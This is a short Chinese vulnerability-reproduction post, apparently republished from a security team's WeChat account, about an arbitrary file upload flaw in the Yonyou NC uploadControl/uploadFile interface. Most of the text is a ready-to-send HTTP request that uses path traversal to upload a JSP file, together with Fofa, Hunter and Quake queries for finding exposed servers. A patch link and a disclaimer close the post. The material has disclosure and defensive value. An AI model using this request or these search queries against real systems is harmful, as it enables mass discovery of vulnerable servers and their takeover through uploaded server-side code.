产品简介
用友NC是大型企业管理与电子商务平台,帮助企业实现管理转型升级全面从以产品为中心转向以客户为中心(C2B);从流程驱动转向数据驱动(DDE);从延时运行转为实时运行(RTE);从领导指挥到员工创新(E2M)
漏洞描述
用友 NC uploadControl/uploadFile 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
网络空间会测
Fofa
title="YONYOU NC"Hunter
app.name="用友 NC Download Page"Quake
app:"用友 NC"
漏洞复现
POST /mp/initcfg/../uploadControl/uploadFile HTTP/1.1
Host: 127.0.0.1
User-Agent: req/v3 (https://github.com/imroc/req)
Content-Length: 366
Content-Type: multipart/form-data; boundary=21e783bad5d805d7b2fe3e5ef7de7e6b0ed13740d4679092487968736c4c
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, br
Connection: close
--21e783bad5d805d7b2fe3e5ef7de7e6b0ed13740d4679092487968736c4c
Content-Disposition: form-data; name="submit"
上传
--21e783bad5d805d7b2fe3e5ef7de7e6b0ed13740d4679092487968736c4c
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: text/plain; charset=utf-8
test
--21e783bad5d805d7b2fe3e5ef7de7e6b0ed13740d4679092487968736c4c--
文件访问路径 /mp/uploadFileDir/test.jsp
修复建议
补丁:https://security.yonyou.com/#/noticeInfo?id=342
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】用友 NC uploadControl/uploadFile 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论